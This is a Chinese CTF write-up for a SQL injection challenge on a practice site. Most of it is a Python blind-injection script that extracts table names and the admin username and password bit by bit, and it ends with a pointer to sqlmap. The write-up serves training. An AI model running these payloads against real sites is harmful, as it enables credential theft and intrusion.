26.看起來有點難
阿新 • • 發佈:2017-08-05
web安全 sql註入 sqli ctf sqlmap
這題進入以後用時間註入測試一下,成功:
之後就是自己寫了個代碼:(寫的比較破,將就看看)
#!/usr/bin/python
#coding=utf-8
import requests
import sys
#計算長度
def length(strs):
for i in range(1,100):
url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or if(("+strs+")="+str(i)+",1,0)%23&pass=[d,b,c]&action=login"
#print url
#sys.exit(0)
html = requests.get(url)
html.encoding=‘gbk‘
if(html.text.find(u"登錄失敗,錯誤的用戶名和密碼") != -1):
return i
else:
pass
#爆破
def blast(lens,strs):
s = "" #臨時保存字母
key = ""#保存字符串(字母拼接)
for i in range(lens):
for j in range(8):
url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or select if(ascii(substring(("+strs+"),"+str(i+1)+",1))%26"+str(2**j)+"="+str(2**j)+",1,0)%23&pass=[d,b,c]&action=login"
#print url
#sys.exit(0)
html = requests.get(url)
html.encoding=‘gbk‘
if(html.text.find(u"登錄失敗,錯誤的用戶名和密碼") != -1):
s = "1" + s
else:
s = "0" + s
key += chr(int(s,2))
s = ""
return key
#復數查詢(多個表,多個字段)
def plural(name,name_len,num):
name_list = []#存儲表名
for i in range(num):
names = name
name_lens = name_len
add = " limit "+str(i)+",1"
names = names+add
name_lens = name_lens + add
tb_s = length(name_lens)#每一個表的長度
tb_name = blast(tb_s,names)#每一個表的名字
name_list.append(tb_name)
return name_list
def main():
#計算數據庫長度
db_len_sql = "Select length(database())"
#db_len= length(db_len_sql)
#爆破數據庫名
db_bl_sql = "database()"
#db_name = blast(db_len,db_bl_sql)
#print db_name
#計算表數量
tb_s_sql = "Select count(table_name) from information_schema.tables where table_schema=‘test‘"
#tb_s = length(tb_s_sql)
#爆破所有表名
tb_name_len = "selEct length(table_name) from information_schema.tables where table_schema=‘test‘"#表名長度
tb_names = "selEct table_name from information_schema.tables where table_schema=‘test‘"#表名
#tb_name_list = plural(tb_names,tb_name_len,tb_s)
#爆破字段名數量
col_s_len = "Select count(column_name) from information_schema.columns where table_name=‘admin‘"
#col_s = length(col_s_len)
#爆破字段名
col_name_len = "selEct length(column_name) from information_schema.columns where table_name=‘admin‘"#表名長度
col_names = "selEct column_name from information_schema.columns where table_name=‘admin‘"#表名
#col_name_list = plural(col_names,col_name_len,col_s)
#爆破username字段
flag_sql = "Select count(username) from admin"
flag_s = length(flag_sql)
flag_len = "Select length(username) from admin"
flag_name = "seleCt username from admin"
lists = plural(flag_name,flag_len,flag_s)
print lists
#爆破password字段
flag_sql = "Select count(password) from admin"
flag_s = length(flag_sql)
flag_len = "Select length(password) from admin"
flag_name = "seleCt password from admin"
lists = plural(flag_name,flag_len,flag_s)
print lists
if __name__ == "__main__":
main()將得到的username,password輸入就可以了
還有一個方法就是,直接sqlmap神器,簡單粗暴,簡直不要太好用了,我就不上圖了
本文出自 “11846238” 博客,請務必保留此出處http://11856238.blog.51cto.com/11846238/1953705
26.看起來有點難